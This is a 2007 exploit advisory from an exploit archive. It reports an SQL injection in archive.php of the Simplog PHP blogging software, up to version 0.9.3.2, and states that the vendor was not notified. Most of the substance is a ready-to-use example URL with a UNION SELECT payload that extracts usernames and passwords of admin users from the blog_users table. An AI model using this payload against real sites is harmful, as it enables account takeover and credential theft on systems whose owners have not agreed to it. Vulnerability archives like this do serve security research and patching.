Home / exploitsPDF  

simplog0932.txt

Posted on 02 January 2007

Afected Software: simplog up to 0.9.3.2 (latest version - 12/05/2006 ) Site: http://www.simplog.org Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple Vulnerability: SQL Injection in archive.php other files probably also affected Example: http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 Vendor status: NOT NOTIFIED Javor Ninov aka DrFrancky drfrancky shift+2 securax.org http://securitydot.net/

 

TOP